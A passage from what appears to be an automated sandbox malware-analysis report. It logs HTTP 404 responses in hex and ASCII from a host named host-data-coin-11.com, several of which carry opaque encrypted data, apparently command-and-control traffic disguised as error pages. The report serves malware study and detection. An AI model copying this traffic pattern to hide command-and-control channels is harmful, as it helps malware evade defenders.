                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:58:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:58:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:58:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:58:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:58:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:58:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:58:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82OOjQmFqdV@dfkK50
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 12:57:45 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 